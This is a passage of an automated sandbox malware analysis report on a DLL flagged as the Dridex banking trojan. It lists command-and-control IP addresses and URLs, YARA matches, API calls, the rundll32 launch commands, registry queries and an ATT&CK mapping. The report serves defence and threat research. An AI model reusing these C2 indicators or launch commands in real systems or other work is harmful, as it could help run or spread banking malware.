                      Source: loaddll32.exe, 00000000.00000003.609859133.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/llUb
                      Source: loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/oft
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.525073328.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.542004971.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/soft
                      Source: loaddll32.exe, 00000000.00000002.780745160.00000000033C0000.00000004.00000001.sdmpString found in binary or memory: https://19.77.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.778016005.000000000099D000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.814827994.0000000005775000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/
                      Source: rundll32.exe, 00000004.00000002.773821588.0000000000FCC000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/(u1
                      Source: loaddll32.exe, 00000000.00000003.465711535.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/4l
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/=l
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Certification
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/El
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/GlobalSign
                      Source: loaddll32.exe, 00000000.00000003.465711535.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Nl
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/O
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Pl
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/R
                      Source: loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Wl
                      Source: loaddll32.exe, 00000000.00000003.465711535.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Yl
                      Source: loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dll
                      Source: loaddll32.exe, 00000000.00000003.733634731.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dll4
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/al
                      Source: loaddll32.exe, 00000000.00000003.457343535.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/coro8
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/en-US
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/f
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/jl
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/k
                      Source: rundll32.exe, 00000004.00000002.814827994.0000000005775000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/ography
                      Source: loaddll32.exe, 00000000.00000003.575651265.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/sl
                      Source: loaddll32.exe, 00000000.00000002.780745160.00000000033C0000.00000004.00000001.sdmpString found in binary or memory: https://195.56.219.47:8116/
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.407113242.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.814827994.0000000005775000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000002.778016005.000000000099D000.00000004.00000020.sdmpString found in binary or memory: https://45.77.0.96:6891/0
                      Source: loaddll32.exe, 00000000.00000003.407113242.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/14
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/6/
                      Source: rundll32.exe, 00000004.00000002.814827994.0000000005775000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Microsoft
                      Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Sg
                      Source: rundll32.exe, 00000004.00000002.814827994.0000000005775000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/graphy
                      Source: loaddll32.exe, 00000000.00000003.407113242.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/h.dll
                      Source: loaddll32.exe, 00000000.00000003.407113242.000000000099D000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/sg
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4844Connection: CloseCache-Control: no-cache
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED639F9 InternetReadFile,
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.5:49753 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.5:49757 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.5:50023 version: TLS 1.2

                      E-Banking Fraud:

                      barindex
                      Yara detected Dridex unpacked fileShow sources
                      Source: Yara matchFile source: 4.2.rundll32.exe.6ed30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.f3db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.83db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.129db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.33fdb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.129db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.83db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6ed30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.f3db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.33fdb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.3.rundll32.exe.e4db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.3.rundll32.exe.e4db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.341889397.00000000033E0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.791906460.000000006ED31000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.390619959.0000000000820000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.369249349.0000000001280000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.340472911.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.387507409.0000000000E30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.815931183.000000006ED31000.00000020.00020000.sdmp, type: MEMORY
                      Detected Dridex e-Banking trojanShow sources
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED351A7 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: SecuriteInfo.com.Variant.Razy.980776.4470.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED467C8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED36AD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED496D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED5FA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED53EC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED4B6F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED48EF0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED562F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED4F6E0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED4AE80
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED48AB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED526B0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED51EB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED51240
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED49E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED4A660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED57660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED52E60
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED3CA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED5FA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED50220
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED5D620
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED483C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED47FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED57FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED4E3F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED4BF50
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED59B10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED53B00
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED51730
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED3ACD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED4A0D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED498DA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED488C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED48CC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED55CB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED4E0A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED54CA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED550A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED5DCA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED4D030
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED51020
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED4FDD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED589F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED571F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED4C590
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED4D980
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED5D180
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED3F9A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED31570
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED47564
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6ED7E210
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED422A0 NtDelayExecution,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED5BE30 NtClose,
                      Source: SecuriteInfo.com.Variant.Razy.980776.4470.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll,Bluewing
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll,Masterjust
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll,Bluewing
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll,Masterjust
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: classification engineClassification label: mal76.bank.troj.evad.winDLL@11/2@0/4
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll,Bluewing
                      Source: SecuriteInfo.com.Variant.Razy.980776.4470.28989Joe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: SecuriteInfo.com.Variant.Razy.980776.4470.dllStatic file information: File size 1375232 > 1048576
                      Source: SecuriteInfo.com.Variant.Razy.980776.4470.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: SecuriteInfo.com.Variant.Razy.980776.4470.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.792034242.000000006EDF7000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.816027837.000000006EDF7000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.4470.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_00B7C762 push eax; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exeCode function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED43930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED5CEF8 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6EDA97B0 IsDebuggerPresent,IsDebuggerPresent,CreateThread,std::_Timevec::_Timevec,WaitForSingleObjectEx,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6EDA8B60 __invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__cftoe,__aligned_msize,__invoke_watson_if_error,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__invoke_watson_if_error,__CrtDbgReportWV,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6EDA47C0 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6EE7BA72 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6EE7B942 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6EE7B64D push dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED46C50 KiUserExceptionDispatcher,LdrLoadDll,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED47A60 RtlAddVectoredExceptionHandler,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6ED763A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 143.244.140.214 40
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.780512330.0000000001270000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.796914302.00000000039D0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.780512330.0000000001270000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.796914302.00000000039D0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.780512330.0000000001270000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.796914302.00000000039D0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: loaddll32.exe, 00000000.00000002.780512330.0000000001270000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.796914302.00000000039D0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: loaddll32.exe, 00000000.00000002.780512330.0000000001270000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.796914302.00000000039D0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetACP,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED42980 GetUserNameW,

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection112Process Injection112OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsObfuscated Files or Information1LSASS MemorySecurity Software Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Network Configuration Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery23Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 510680 Sample: SecuriteInfo.com.Variant.Ra... Startdate: 28/10/2021 Architecture: WINDOWS Score: 76 28 Found malware configuration 2->28 30 Yara detected Dridex unpacked file 2->30 32 C2 URLs / IPs found in malware configuration 2->32 7 loaddll32.exe 13 2->7         started        process3 signatures4 36 Detected Dridex e-Banking trojan 7->36 10 cmd.exe 1 7->10         started        12 rundll32.exe 7->12         started        14 rundll32.exe 7->14         started        16 rundll32.exe 7->16         started        process5 process6 18 rundll32.exe 12 10->18         started        dnsIp7 22 185.56.219.47, 49758, 49766, 49767 KELIWEBIT Italy 18->22 24 192.46.210.220, 443, 49753, 49757 FRAUNHOFER-CLUSTER-BWResearchInstitutesspreadalloverGe United States 18->24 26 2 other IPs or domains 18->26 34 System process connects to network (likely due to code injection or exploit) 18->34 signatures8

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Variant.Razy.980776.4470.dll2%ReversingLabs

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://143.244.140.214:808/hy0%URL Reputationsafe
                      https://195.56.219.47:8116/0%Avira URL Cloudsafe
                      https://185.56.219.47/Wl0%Avira URL Cloudsafe
                      https://143.244.140.214:808/:0%Avira URL Cloudsafe
                      https://192.46.210.220/aenh.dll0%Avira URL Cloudsafe
                      https://192.46.210.220/aenh.dll40%Avira URL Cloudsafe
                      https://185.56.219.47:8116/4h0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/sg0%Avira URL Cloudsafe
                      https://143.244.140.214:808/(0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/0%URL Reputationsafe
                      https://192.46.210.220/Certification0%URL Reputationsafe
                      https://45.77.0.96/0%URL Reputationsafe
                      https://192.46.210.220/Wl0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/oft0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/(0%Avira URL Cloudsafe
                      https://143.244.140.214:808/%0%Avira URL Cloudsafe
                      https://143.244.140.214:808/X0%Avira URL Cloudsafe
                      https://192.46.210.220/Pl0%Avira URL Cloudsafe
                      https://143.244.140.214:808/oft0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/h.dll0%Avira URL Cloudsafe
                      https://192.46.210.220/coro80%Avira URL Cloudsafe
                      https://45.77.0.96:6891/6/0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/fW0%Avira URL Cloudsafe
                      https://143.244.140.214:808/ll0%Avira URL Cloudsafe
                      https://192.46.210.220/0%URL Reputationsafe
                      https://185.56.219.47:8116/Ub0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/llUb0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/soft0%Avira URL Cloudsafe
